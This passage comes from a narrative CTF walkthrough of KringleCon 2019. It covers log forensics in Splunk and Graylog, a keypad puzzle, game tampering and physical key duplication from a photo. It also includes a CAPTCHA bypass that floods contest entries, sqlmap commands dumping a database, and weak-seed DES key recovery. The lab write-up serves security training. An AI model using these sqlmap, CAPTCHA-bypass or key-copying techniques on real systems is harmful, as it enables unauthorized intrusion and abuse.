Question 2:  What is the name of the sensitive file that was likely accessed and copied by the attacker?

 

Answer:  It looks like it wants the Full Path to the file.  Searching all things cbanas (using index=main cbanas) we find one entry where a .txt file calls into PowerShell with an OutputString call to a Naughty_and_Nice_2019_draft.txt file as the input.  That means PowerShell is trying to copy the contents of that file into something else.  That would make C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt the likely file that was accessed.

Question 3:  What is the fully-qualified domain name(FQDN) of the command and control(C2) server? 

 

Answer:  To discover this, I look for any network events in sysmon that involve PowerShell with this query index=main sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational powershell EventCode=3 which yields 159 results, but all to the same destination hostname of 144.202.46.214.vultr.com.  I believe we have found our Command and Control Server.  That search string is looking through Sysmon logs for a PowerShell event with an Event Code of 3 which is the code for Network Connections.

Question 4:  What document is involved with launching the malicious PowerShell code? 

 

Answer:  I start by searching for all the PowerShell logs with index=main sourcetype="WinEventLog:Microsoft-Windows-Powershell/Operational", but that leads us to over 1000 results.  Let’s look at a 5 second window around the oldest event.  The oldest Powershell event was August 25, 2019 at 9:18:37:000 AM – Event Time.  So, using index=main sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational and set the date range for that 10 second window.  That narrows it down to 12 events with only 2 ProcessIDs.  6268 has 8 instances out of 12 and 5864 had the other 4.  Let’s check on the majority.  Convert 6268 into Hex and search for new processes starting, or Event code 4688, with index=main sourcetype=WinEventLog EventCode=4688 process_id=0x187C, making sure you expand the time frame back to all time, and you will see only one event with a Process Command Line: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\Temp\Temp1_Buttercups_HOL404_assignment (002).zip\19th Century Holiday Cheer Assignment.docm" /o "".  Making the document in question, 19th Century Holiday Cheer Assignment.docm as the culprit.

Question 5:  How many unique email addresses were used to send Holiday Cheer essays to Professor Banas? 

 

Answer:  To determine this information, I need to look through the stoq logs using index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body | sort - _time.  This produces 42 events.  Logic would state that each message would have 2 instances, send and receive so there would be 21 unique address, but I need to confirm that.  To confirm that, I need to only look at messages going to carl.banas and only those with a subject containing Holiday Cheer Assignment Submission with index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body | search results{}.workers.smtp.subject="*Holiday

Cheer Assignment Submission*" results{}.workers.smtp.to="*carl*" and we can confirm that there are 21 unique email addresses sending their essays to Professor Banas.

 

Question 6:  What was the password for the zip archive that contained the suspicious file? 

 

Answer:  This one is easy to answer.  Playing off the results from the previous search, we can see that the original message has the password as 123456789.  Although, we could run index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.from  results{}.workers.smtp.subject results{}.workers.smtp.body | search results{}.workers.smtp.body="*password*" to find any reference to a password inside of a message body, but again, hackers are lazy creatures.  Why work harder than I have to?

 

Question 7:  What email address did the suspicious file come from? 

 

Answer:  Again, playing from the results of the search in Question 5 or the results of the search ran in Question 6, I can see the file came from bradly.buttercups@eifu.org or someone pretending to be him.  Notice: I said @e”i”fu.org and not eLfu.org.  This is a case of domain case type squatting.  A capital i in most digital environments looks much like a lowercase l: Il  If I flip the cases on that it comes out as iL.  The uppercase I is just a hair shorter than the lowercase l, but without having them next to each other, most people would never notice.

Primary Objective Question:  What was the message for Kent that the adversary embedded in this attack? 

 

Answer:  I know the email that started the whole mess was the one from Bradly Buttercups.  Let’s grab that email and extract file metadata out of it using index=main sourcetype=stoq  "results{}.workers.smtp.from"="bradly buttercups <bradly.buttercups@eifu.org>" | eval results = spath(_raw, "results{}")

| mvexpand results

| eval path=spath(results, "archivers.filedir.path"), filename=spath(results, "payload_meta.extra_data.filename"), fullpath=path."/".filename

| search fullpath!=""

I can see 19 file metadata files, one of which is the 19th Century Holiday Cheer Assignment.docm.  When I try to open that assignment document in the File Archive, I am told to open core.xml instead when I get to the folder the doc should be in.  OK.

 

“Cleaned for your safety. Happy Holidays!

 

In the real world, This would have been a wonderful artifact for you to investigate, but it had malware in it of course so it's not posted here. Fear not! The core.xml file that was a component of this original macro-enabled Word doc is still in this File Archive thanks to stoQ. Find it and you will be a happy elf :-) “

Navigating to http://elfu-soc.s3-website-us-east-1.amazonaws.com/?prefix=stoQ%20Artifacts/home/ubuntu/archive/f/f/1/e/a/ and opening the file in Notepad ++ yields:

       I have found the message: “Kent you are so unfair. And we were going to make you the king of the Winter Carnival.”  I enter that into the KringleCon console.  Achievement Unlocked: Splunk – You have completed the Splunk challenge!  Let’s run back into the Laboratory to tell Professor Banas the news.  “Professor Banas.  Here’s what happened.” As I run through everything, I found during the Splunk objective the Professor seems to grasp parts of what I’m saying and glossing over other parts.  I’m used to that though.  When I finish explaining he takes a deep breath. “Oh, thanks so much for your help! Sorry I was freaking out. I've got to talk to Kent about using my email again......and picking up my dry cleaning.”  “No problem, Professor.  I’ve got to go.”  It is time to deal with that keypad in the Quad.

Chapter 8:  Get Access to the Steam Tunnels

       I had pretty much helped everyone that I could and completed all of the objectives that I could outside of whatever is in the Dormitory. Well, that and the mysterious crate Kent was talking about.  So, it was time to tackle the keypad.  I head to the Quad and stride up to the elf next to the keypad and ask, “Neville forget the password again?”  “Hey kid, it’s me, Tangle Coalbox. I’m sleuthing again, and I could use your help. Ya see, this here number lock’s been popped by someone. I think I know who, but it’d sure be great if you could open this up for me. I’ve got a few clues for you.

 

  1. One digit is repeated once.
  2. The code is a prime number.
  3. You can probably tell by looking at the keypad which buttons are used.”
Challenge 7: Frosty Keypad

Challenge URL:  https://keypad.elfu.org/?challenge=keypad

Challenge Objective:  Determine the 4-digit code for the Dormitory

Terminal Start:

       The obvious 3 numbers that are used are 1,3, and 7.  Well, I am a huge fan of the movie Hackers, even with its complete inaccuracies, but one term that always will endure is calling a hacker elite.  Over the years, that has sometimes been used derogatorily and, for better or worse, has been shortened to leet.  Leet is often represented by the numbers 1337.  It can’t be that easy.  I enter 1337. Incorrect Code.  It’s never THAT easy.  Well, think backwards.  I enter 7331.  Miraculously, the door unlocks, and I get an

 

Achievement Unlocked: Frosty Keypad – You have completed the Frosty Keypad challenge! alert.  Well that works.  Let’s see what’s in the Dormitory.
 
Dormitory

 

            Upon first entering the dorm, I see a wall of bookshelves on the far wall of the main room with a hallway on either side of that main room.  There’s a snack machine for those late-night study sessions and a refrigerator stocked with enough eggnog to drown a US Naval vessel. In front of the bookshelves is an elf with a long white beard scanning the screen of his laptop with his eyes as if searching for something.  In the hallway to the right of the exit door is an elf with purple hair and a blue ski cap playing on her laptop.  The sounds coming from her laptop reminded me of those old nostalgic 8-bit video games that got me started in IT in the first place.  My heart warmed a bit at that old sound.  I also notice the code to the door written on the wall of the hallway heading to the elf that is playing a game. “Really?  Never write your passwords down people” I thought.

       First things first.  My next objective is to get access to the steam tunnels and there appear to be two challenges here that I can complete.  I head for the bookshelves.  “You seem to be looking for something.  Anything I can do to speed your search along?” I ask.  “It’s me - Pepper Minstix. Normally I’m jollier, but this Graylog has me a bit mystified. Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala. Some Elf U computers were hacked, and I’ve been tasked with performing incident response. Can you help me fill out the incident response report using our instance of Graylog? It’s probably helpful if you know a few things about Graylog. Event IDs and Sysmon are important too. Have you spent time with those? Don’t worry - I’m sure you can figure this all out for me! Click on the All messages Link to access the Graylog search interface! Make sure you are searching in all messages! The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner. Login with the username elfustudent and password elfustudent.” Pepper seems eager for my help. So, I hop on his terminal to see what I can find.

Challenge 8: Graylog

Challenge URL:  https://incident.elfu.org/

Challenge Objective:  Complete the Incident Report Filing with the correct information from Graylog

Terminal Start:

I am asked to answer 10 questions to complete the incident report [43].

 

Question 1:  Minty CandyCane reported some weird activity on his computer after he clicked on a link in Firefox for a cookie recipe and downloaded a file. What is the full-path + filename of the first malicious file downloaded by Minty?

 

Answer:  To find this information, simply search for filename of cookie. TargetFilename:/.+cookie.+/ and I am given the result of C:\Users\minty\Downloads\cookie_recipe.exe.

Question 2:  The malicious file downloaded and executed by Minty gave the attacker remote access to his machine. What was the ip:port the malicious file connected to first?

 

Answer:  I learned earlier that network events have an Event ID of 3 (Chapter 7 Question3), so let’s search processes starting from the cookie recipe with an Event ID of 3 with ProcessImage:/.+cookie_recipe.exe/ AND EventID:3 and I see the IP and port are 192.168.247.175:4444

Question 3:  What was the first command executed by the attacker?

 

Answer:  If I modify the last search to use parent processes with ParentProcessImage:/.+cookie_recipe.+/ we see the first command run is whoami

Question 4:  What is the one-word service name the attacker used to escalate privileges?

 

Answer:  If I reuse the last search, ParentProcessImage:/.+cookie_recipe.+/ and track by user account I can see the service used to escalate is webexservice

Question 5:  What is the file-path + filename of the binary ran by the attacker to dump credentials?

Answer:  Still reusing the last search, I can see, at the top of the list, the attacker tries to run mimikatz and then runs C:\cookie.exe.  It appears that cookie.exe is that binary that dumped the credentials.

Question 6:  The attacker pivoted to another workstation using credentials gained from Minty's computer. Which account name was used to pivot to another machine?

 

Answer:  Earlier I learned that a successful logon is Event ID 4624 (Chapter 4) and I know Mitty’s source IP is 192.168.247.175.  So, let me search based on that with EventID: 4624 AND SourceNetworkAddress:192.168.247.175 and I see that the attacker logged on with Alabaster’s account.  Poor Mr. Snowball. He can’t win today.

Question 7:  What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection to another machine?

 

Answer:  EventID 4624 is a logon success and a Logon Type 10 is used for RDP (Remote Desktop Protocol). So, let’s use EventID: 4624 AND LogonType:10 and I get only one event at 06:04:28

Question 8:  The attacker navigates the file system of a third host using their Remote Desktop Connection to the second host. What is the SourceHostName,DestinationHostname,LogonType of this connection?

 

Answer:  We know by looking at that RDP event that the attacker is now on elfu-res-wks2 and is apparently navigating the filesystem of a third host.  There would still need to be a successful logon on so EventID 4624 could still be used.  Let’s look for all 4624’s with elfu-res-wks2 as the source using SourceHostName:"ELFU-RES-WKS2" AND EventID:4624.  Success!  I see 6 events where elfu-res-wks2 connected to elfu-res-wks3 with logontype 3 which is UNC path.  That makes the challenge answer elfu-res-wks2,elfu-res-wks3,3

Question 9:  What is the full-path + filename of the secret research document after being transferred from the third host to the second host?

 

Answer:  So, we are technically still on WKS2 grabbing a file on WKS3.  There would be a sysmon file creation event id of 2 with a source of workstation 2. I can also use regex to filter out overly common file paths using something like source:"elfu-res-wks2" AND EventID:2 AND NOT TargetFilename:/.+AppData.+/ AND NOT TargetFilename:/.+updatestore.+/  With that I get only two event results!  The first result is an obvious dead end, but the second yields exactly what I need. C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf 

Question 10:  What is the IPv4 address (as found in logs) the secret research document was exfiltrated to?

 

Answer:  To find this, I just search for the filename from Question 9 and find a PowerShell Invoke-WebRequest to Pastebin.com.  Now, search based on WKS2 being the Source, Pastebin being the DestinationHostName and an EventID of 3 for Network events using source:"elfu-res-wks2" AND EventID:3 AND DestinationHostname:"pastebin.com" and I am left with only one result that includes a Destination IP of 104.22.3.84

       With that it looks like Pepper’s Incident Report is Completed.  I save the report for posterity (D1) and hand the  terminal back to Pepper.  “That’s it - hooray! Have you had any luck retrieving scraps of paper from the Elf U server? You might want to look into SQL injection techniques. OWASP is always a good resource for web attacks [44]. For blind SQLi, I’ve heard Sqlmap is a great tool. In certain circumstances though, you need custom tamper scripts to get things going [45]!”

 

Achievement Unlocked: Graylog – You have completed the Graylog challenge! 

 

       Let’s see what other bits of fun are in store. As I head down the hallway to the right of the main door, the giggles of glee coming from the purple haired elf draw my attention.  I hop over to watch him staring intently at her terminal with the focus only video gaming can produce. “What’cha playing?” I inquire.  “Hi! I’m Minty Candycane! I just LOVE this old game! I found it on a 5 1/4 floppy in the attic. You should give it a go! If you get stuck at all, check out this year’s talks. One is about web application penetration testing [32]. Good luck, and don’t get dysentery!”  Thinking back, I do seem to recall a talk from Chris Elgee about Web App Testing.  Let’s see if I can put those skills to work here.  I hop onto the terminal and away I go.

Challenge 9: Holiday hack trail

Challenge URL:  https://trail.elfu.org/gameselect/

Challenge Objective:  Make it to the KringleCon before December 25 with everyone alive and try doing it on HARD difficulty.

Terminal Start:

Of course, select HARD for the Difficulty.  Go big or go home, right?  At the purchase screen, since this is likely a dry run, just click buy and you are presented with your first travel screen.

Checking out the code inside the Firefox Dev Tools [10], I come across this juicy piece of coding here with a hash value that is the MD5 of 1626 which is pretty close to the total for my inventory. 

Let’s move forward one day and see what happens.

Well, well.  My distance in the container went to 40, my food dropped to 92 and the hash value changed to 1659.  Interesting.  Let’s put the food back to 100, set the distance to 7999, and change the hash value over to the MD5 of 1626 + 7999 or a330f9fecc388ce67f87b09855480ca3 and then hit Go.

I fell off the trail.  Let’s change those parameters straight from the first day. 

       That worked!  We are successful and are greeted with

 

Achievement Unlocked: Holiday Hack Trail – You have completed the Holiday Hack Trail Challenge! 

 

       As I hand the terminal back to Minty, still beaming at my success even though I cheated, “You made it - congrats! Have you played with the key grinder in my room? Check it out! It turns out: if you have a good image of a key, you can physically copy it. Maybe you’ll see someone hopping around with a key here on campus. Sometimes you can find it in the Network tab of the browser console. Deviant has a great talk on it at this year’s Con [34]. He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale [46].”  I guess that’s an invitation to play with the key grinder in Minty’s room. 

 

Minty’s Dorm Room

 

       As I first step into Minty’s dorm room, I see a gentleman that’s not quite an elf, but not quite human either hop into, of all places, the closet.  Ok, as if that’s not weird enough, I notice he has a key latched to his belt.  Remembering Minty’s earlier comment, I quickly grab a picture of the key and begin “inspecting the Elements” of that picture.  For those of you following along at home, Inspect Element is neat little Developer trick that you can use on Lazlo before he ducks into the closet to grab his picture URL located at  https://kringlecon.com/images/avatars/elves/krampus.png Oh and spoiler alert, Lazlo is Krampus. Sorry, had a bit of a 4th wall break moment there. So, once I had a picture of key, I have to duplicate it.  Using the techniques from Deviant’s talk [34] and the templates provided in Minty’s hint [46], I was quickly able to deduce that we were dealing with a Schlage lock and key.  Easy part down, hard part to go.  Using the Schlage Template, and a lot of image manipulation in GIMP, I was finally able to get an overlay image and begin trying to play around with the measurements. 

       To say the least, this was not an easy task.  It took a lot of math and playing with aspect ratios to get the image of the key closer to the actual key dimensions and the template to match the actual key sizes.  After many hours of blood, sweat, tears, many packs of cigarettes, much alcohol, and several creative swear words that would make a sailor blush, I finally got the bitting code down to 122520 and tried it on the odd lock that was in Minty’s closet.  Success!  As I moved forward into the creepy door in the closet that just said, “This is it”, I wondered to myself if this was such a good idea.  I guess I would find out. I step through the door at the back of the closet and into the Steam Tunnels.  “Well, at least I know why Lazlo/Krampus came into the closet” I thought.  All of my trepidation seemed to be for naught as I rounded the corner and came face to face with Krampus himself. 

 

       “Hello there! I’m Krampus Hollyfeld. I maintain the steam tunnels underneath Elf U, Keeping all the elves warm and jolly. Though I spend my time in the tunnels and smoke, In this whole wide world, there’s no happier bloke! Yes, I borrowed Santa’s turtle doves for just a bit. Someone left some scraps of paper near that fireplace, which is a big fire hazard. I sent the turtle doves to fetch the paper scraps. But, before I can tell you more, I need to know that I can trust you. Tell you what – if you can help me beat the Frido Sleigh contest (Objective 8), then I’ll know I can trust you. The contest is here on my screen and at fridosleigh.com [47]. No purchase necessary, enter as often as you want, so I am! They set up the rules, and lately, I have come to realize that I have certain materialistic, cookie needs. Unfortunately, it’s restricted to elves only, and I can’t bypass the CAPTEHA. (That’s Completely Automated Public Turing test to tell Elves and Humans Apart.) I’ve already cataloged 12,000 images [48] and decoded the API interface [49]. Can you help me bypass the CAPTEHA and submit lots of entries?”  I now know Krampus’ full name - Krampus Hollyfeld.  I enter that into the KringleCon console and voila! 

 

Achievement Unlocked: Get Access to the Steam Tunnels – You have completed the Get Access to the Steam Tunnels challenge! 
Chapter 9:  Bypassing the Frido Sleigh CAPTEHA

       “Help Krampus beat the Frido Sleigh contest. For hints on achieving this objective, please talk with Alabaster Snowball in the Speaker Unpreparedness Room.”  Krampus was not at all what I had expected.  He seems more forlorn to not be included in the contest than angry.  Perhaps he’s not the one causing the problems.  I’m going to help him with the contest and see where it leads.  My hardware and Internet connection are old and terrible and machine learning needs some pretty beefy specifications.  So, I turned to FloydHub.com [50].  I uploaded the TensorFlow trainer from Chris Davis’ talk [27] that he posted on GitHub for us [51] along with the image library [48].  I set a CPU workspace to work in FloydHub training while I worked on incorporating processing into the API wrapper.  What I ended up with were two separate python scripts, one calling the other.  The first was the API Wrapper from Krampus [C1] and the second is the classifier.py that is imported as Classifier into the wrapper [C2].

 

               By this point the workspace had finished training its TensorFlow model.  So, I made sure that the output of the training, output_graph.pb and output_labels.txt, were in the correct location as they would be the input dataset for this new script.  So, the new dataset is named outtoin, as in output to input. Once I am sure that the dataset is in the right place, I change the workspace over to a GPU model for faster processing and execute the captcha_api.py script.  After a few false starts:

 
Starting ML Capteha breaker
TensorFlow engine ready
Getting capteha images
We need Christmas Trees, Ornaments or Presents:
Calculating image types
Waiting For classification to Finish...
d197df91-e587-11e9-97c1-309c23aaf0ac is a Christmas Trees
5dcfe371-e587-11e9-97c1-309c23aaf0ac is a Presents
a438ad60-e586-11e9-97c1-309c23aaf0ac is a Presents
---------------shortened for brevity------------------------------
Sending d197df91-e587-11e9-97c1-309c23aaf0ac,5dcfe371-e587-11e9-97c1-309c23aaf0ac,a438ad60-e586-11e9-97c1-309c23aaf0ac,
eef9fffb-e587-11e9-97c1-309c23aaf0ac,b60711cd-e586-11e9-97c1-309c23aaf0ac,16e12f27-e587-11e9-
97c1-309c23aaf0ac,2659eaae-e586-11e9-97c1-309c23aaf0ac,9ae29dd8-
---------------shortened for brevity------------------------------
FAILED MACHINE LEARNING GUESS
--------------------
Our ML Guess:
--------------------
d197df91-e587-11e9-97c1-309c23aaf0ac,5dcfe371-e587-11e9-97c1-309c23aaf0ac,a438ad60-e586-11e9-97c1-309c23aaf0ac,
eef9fffb-e587-11e9-97c1-309c23aaf0ac,b6
---------------shortened for brevity------------------------------
--------------------
Server Response:
--------------------
Timed Out!
Getting capteha images
We need Stockings, Candy Canes or Ornaments:
Calculating image types
Waiting For classification to Finish...
05441a98-e585-11e9-97c1-309c23aaf0ac is a Ornaments
---------------shortened for brevity------------------------------
Sending 05441a98-e585-11e9-97c1-309c23aaf0ac,3d128423-e585-11e9-97c1-309c23aaf0ac,e55ac481-e585-11e9-97c1-309c23aaf0ac,
1a6a470a-e586-11e9-97c1-309c23aaf0ac,b8f33295
---------------shortened for brevity------------------------------
CAPTEHA Solved!
Submitting lots of entries until we win the contest! Entry #1
Submitting lots of entries until we win the contest! Entry #2
Submitting lots of entries until we win the contest! Entry #3
Submitting lots of entries until we win the contest! Entry #4
---------------shortened for brevity------------------------------
Submitting lots of entries until we win the contest! Entry #110
Submitting lots of entries until we win the contest! Entry #111

{"data":" id=\"result_header\"> Entries for email address cruggieri@hotmail.com no longer accepted as our systems show your email was
already randomly selected as a winner! Go check your email to get your winning code. Please allow up to 3-5 minutes for the email to 
arrive in your inbox or check your spam filter settings. 

Congratulations and Happy Holidays!","request":true}

       A few minutes later and I receive the Congratulations email, but the code does not appear to be in the email.  So, I look at the Source of the email and sure enough, buried in the div class of the button is the verification code that I need: 8Ia8LiZEwvyZr2WO.  Entering that code into the KringleCon console grants me a success message and

 

Achievement Unlocked: Bypassing the Frido Sleigh CAPTEHA – You have completed the Bypassing the Frido Sleigh CAPTEHA challenge!

       Turning back to Krampus, happy to have helped, I tell him, “Hey, you won!”  Gleefully he replies, “You did it! Thank you so much. I can trust you! To help you, I have flashed the firmware in your badge to unlock a useful new feature: magical teleportation through the steam tunnels. As for those scraps of paper, I scanned those and put the images on my server. I then threw the paper away. Unfortunately, I managed to lock out my account on the server. Hey! You’ve got some great skills. Would you please hack into my system and retrieve the scans? I give you permission to hack into it, solving Objective 9 in your badge. And, as long as you’re traveling around, be sure to solve any other challenges you happen across.”

 

Achievement Unlocked: Teleportation via Steam Tunnels - Whee! You can now use the steam tunnels to move quickly around Elf U! 

 

       Neat!  Now I can zip around campus using the Steam Tunnels.  That’s much more efficient!  “Thanks, Krampus!” I reply, but Krampus’ attention has moved on to something else, and so must mine.  Time to see what these scraps of paper are all about.

Chapter 10:  Retrieve Scraps of Paper from Server

       “Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there [52]. What is the name of Santa's cutting-edge sleigh guidance system? For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.”  For this, I need to see how the server is handling requests.  So, I fire up Burp Suite Community, set my browser to use Burp as a proxy so that I may capture requests, and navigate to studentportal.elfu.org.  Just for giggles, I put my real email address in, submit it and allow the request to complete.  It looks as though there is an anti-Cross Site Request Forgery token in play at https://studentportal.elfu.org/validator.php.  OK. I can handle that with a macro inside of Burp.  Setting the macro to validator.php with a regex value of (.*?)$ will select everything in the response, clicking the checkbox to Exclude HTTP Headers will only grab the token itself. 

              

       From there, set the Session Handling to ensure the Proxy is included to run the macro, all URLs are included, but that the macro is restricted to only the token parameter.  Once the macro is set, I can test by sending a request to https://studentportal.elfu.org/application-check.php?elfmail=1&token= and the macro should still pull the token and show the application as “still processing.”

Next run, sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token= " --level=4 --risk=3 --dbms "MySQL" --proxy="http://127.0.0.1:8080/" and I eventually find 3 tables.

 

Database: elfu

[3 tables]

+--------------+

| applications |

| krampus |

| students |

+--------------+

Done

 

Now, since the scraps are Krampus’, let’s look in Krampus using sqlmap -u "https://studentportal.elfu.org/application-check.php?elfmail=1&token=" -D elfu --dump -T krampus -C path --proxy=”http://127.0.0.1:8080/” and I get 6 responses.

 

Database: elfu

Table: krampus

[6 entries]

+-----------------------+

| path                  |

+-----------------------+

| /krampus/0f5f510e.png |

| /krampus/1cc7e121.png |

| /krampus/439f15e6.png |

| /krampus/667d6896.png |

| /krampus/adb798ca.png |

| /krampus/ba417715.png |

+-----------------------+

Done

 

https://studentportal.elfu.org/krampus/0f5f510e.png

https://studentportal.elfu.org/krampus/1cc7e121.png

https://studentportal.elfu.org/krampus/439f15e6.png

https://studentportal.elfu.org/krampus/667d6896.png

https://studentportal.elfu.org/krampus/adb798ca.png

https://studentportal.elfu.org/krampus/ba417715.png

       We have retrieved the scraps of paper and reassembled the letter!  Diverting Santa’s sled on Christmas?!?!  The cutting-edge sleigh guidance technology is called the Super Sled-o-Matic.  I enter that into the KringleCon console and another Objective is completed! 

 

Achievement Unlocked: Retrieve Scraps of Paper from Server – You have completed the Retrieve Scraps of Paper from Server challenge!  

 

       The Tooth background is giving me pause.  Could that be a clue?  I turn back to Krampus eager to share what I’ve learned. “Krampus, someone is going to try and destroy Christmas by hijacking the guidance system on Santa’s Sleigh!  We have to find out who and stop them!” Krampus replies, “Wow! We’ve uncovered quite a nasty plot to destroy the holiday season. We’ve gotta stop whomever is behind it! I managed to find this protected document on one of the compromised machines in our environment. I think our attacker was in the process of exfiltrating it. I’m convinced that it is somehow associated with the plan to destroy the holidays. Can you decrypt it? There are some smart people in the NetWars challenge room who may be able to help us.”  Solemnly I reply, “I can only try, Krampus. I can only try.”

Chapter 11:  Recover Cleartext Document

       “The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can’t send you the source, but we do have debug symbols that you can use. Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC. What is the middle line on the cover page? (Hint: it’s five words) For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.”  I remember Holly Evergreen talking about Mr. Bowes breathing opcodes [23].  Let’s see if I can put his knowledge to good use.  I pull Elfscrow.exe up in Ghidra and run its auto-analyzer.  Once that completes, I pull up the Defined Strings Window and looking through, I see several Crypt items, one of which at 00404aa8 lets me know that this is a DES-CBC function.  Loading eldscrow.pub and doing the same will show me ?super_secure_random.  Now if I search inside of elfscrow.exe for the super string I find this function:

       The two key numbers there are 0x343fd and 0x269ec3, which converted to decimal are 214013 and 2531011 respectively.  Encrypting dummy files, I can quickly see that the seed is an Epoch conversion of a timestamp.  The objective tells us that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.  Using the Epoch converter [53], we get a range between 1575658800 and 1575666000.  Using information from Mr. Bowes’ talk [23], I was able to recreate a decryption script using pypdf2 in python 3 to determine the Key value = b5ad6a321240fbec [C3]

 

       After a few brief moments, the file output itself as the Keyvalue.pdf and appears to be the Quick Start Guide for the Super Sled-O-Matic’s Machine Learning Sleigh Route Finder.  In fact, Machine Learning Sleigh Route Finder is the challenge code for the KringleCon console!

 

Achievement Unlocked: Recover Cleartext Document - Congratulations! You have completed the Recover Cleartext Document challenge! 

 

       Well, it looks like it is time to go see an elf about …… a crate?

Chapter 12:  Open the Sleigh Shop Door

       “Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny? For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.”  “I can honestly say this has been the strangest Christmas vacation that I’ve had in quite some time.” I think as I walk back into the Student Union, “never a dull moment.”   I march up to the elf that has been guarding the Sleigh Shop Door and before I can even open my mouth. “Psst - hey! I’m Shinny Upatree, and I know what’s going on! Yeah, that’s right - guarding the sleigh shop has made me privvy to some serious, high-level intel. In fact, I know WHO is causing all the trouble. Cindy? Oh no no, not that who. And stop guessing - you’ll never figure it out. The only way you could would be if you could break into my crate, here [54]. You see, I’ve written the villain’s name down on a piece of paper and hidden it away securely!” Let’s have a look at this crate then.

Seriously!?! 10 locks with 10 little riddles.  Fortunately, I have just topped off my coffee.  Let’s have at these riddles then.  They change after every refresh, so while I will put the codes and how to get them, just know that they will be different every time.   I recommend Chrome for this part.

 

Riddle 1:  You don't need a clever riddle to open the console and scroll a little.

 

Answer:  Open Chrome Dev Tools and go to the Console Tab.  Scroll up and find your first code.

Riddle 2:  Some codes are hard to spy, perhaps they'll show up on pulp with dye?

 

Answer:  Paper is made with pulp.  Go to Print and the Print Preview window will have the code.

Riddle 3:  This code is still unknown; it was fetched but never shown.

 

Answer:  In Dev Tools Network Tab, you will see several GET statements of a PNG file.  The code is in the image.

Riddle 4:  Where might we keep the things we forage? Yes, of course: Local barrels!

 

Answer: The Storage Tab of Dev Tools will have the code.

Riddle 5:  Did you notice the code in the title? It may very well prove vital.

 

Answer:  In the Title portion of the Code Header is the code.

Riddle 6:  In order for this hologram to be effective, it may be necessary to increase your perspective.

 

Answer:  Inspect Element on the hologram and increase the perspective value.

Riddle 7:  The font you're seeing is pretty slick, but this lock's code was my first pick.

 

Answer:  Inside the Elements or Inspector tab of Dev Tools search for font-family.

Riddle 8:  In the event that the .eggs go bad, you must figure out who will be sad.

 

Answer:  Two things.  First, this answer never changes. Second, this was admittedly easier to find in the Firefox Dev tools.  If I Inspect the eggs element, I will see that there is an event marker on it.  Clicking the event marker shows a spoil event and shows that Veronica would be sad.

Riddle 9:  This next code will be unredacted, but only when all the chakras are :active.

 

Answer:  This has an unintended method.  The intended way is to force the pseudo classes active onto the .chakras to produce the code.  However, if you look through the Source tab for chakra you can see the code and in what order it should be in.

Riddle 10:  Oh, no! This lock's out of commission! Pop off the cover and locate what's missing.

 

Answer:  The components are all there.  They are just in the wrong order.  Expand the HTML code for div class lock c10.  Move the div class component lines for macaroni, swab and gnome under div lock c10, but before cover.  If I edit the HTML in ANY way in Firefox, it will cause the on-click event to disappear.  So, I must either do this part in Chrome, or drag and drop the components in Firefox. Along the way, looking in the c10 source I found https://crate.elfu.org/images/lock_inside.png which actually has the code on it.  This code also never changes.  It is always KD29XJ37

 

<div class="lock c10" data-children-count="1">

    <div class="component macaroni" data-code="A33" data-children-count="0"></div>

    <div class="component swab" data-code="J39" data-children-count="0"></div>

               <div class="component gnome" data-code="XJ0" data-children-count="0"></div>

               <div class="cover">

               <button data-id="10" disabled="disabled" data-children-count="0">Unlock</button>

               </div>

               <input type="text" maxlength="8" data-id="10">

               <button class="switch" data-id="10"></button>

               <span class="led-indicator locked"></span>

               <span class="led-indicator unlocked"></span>

               </div>

       The locks are open and we are in the crate!  Wait!  The Tooth Fairy!  The Tooth Fairy has been the one behind this entire scheme to destroy Christmas!  I have to find and warn Santa before it’s too late or at least grab the Tooth Fairy before she can cause any more harm! 

Achievement Unlocked: Open the Sleigh Shop Door - Congratulations! You have completed the Open the Sleigh Workshop Door challenge!

 

       I turn back to Shinny, “I have to stop her!” “Wha - what?? You got into my crate?! Well that's embarrassing...But you know what? Hmm... If you're good enough to crack MY security...Do you think you could bring this all to a grand conclusion?  Please go into the sleigh shop and see if you can finish this off!

Stop the Tooth Fairy from ruining Santa's sleigh route!” Shinny seemed confident in my abilities.  So, I rush into the Sleigh Shop to stop the Tooth Fairy!

Chapter 13:  Filter Out Poisoned Sources of Weather Data

       “Use the data supplied in the Zeek JSON logs [55] to identify the IP addresses of attackers poisoning Santa's flight mapping software. Block the 100 offending sources of information to guide Santa's sleigh through the attack. Submit the Route ID ("RID") success value that you're given [56]. For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.” As I burst through the Sleigh Shop door, I am met by the surprised stares of the Tooth Fairy, Krampus, and an elf that I haven’t met before. I knew what the Tooth Fairy was doing here, but why was Krampus here?  And this other elf?  Was he friend or foe?  As I hurried over to Krampus, all he would mutter is, “But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!” over and over.  Let’s see what this new elf wants.  I ask, “You look like you need some help.  What can I do?” The elf replied, “I’m pretty sure one of these connections is a malicious C2 channel… Do you think you could take a look? I hear a lot of C2 channels have very long connection times. Please use jq to find the longest connection in this data set. We have to kick out any and all grinchy activity!”

Challenge 10:  Zeek JSON Analysis

Challenge URL:  https://docker2019.kringlecon.com/?challenge=jq

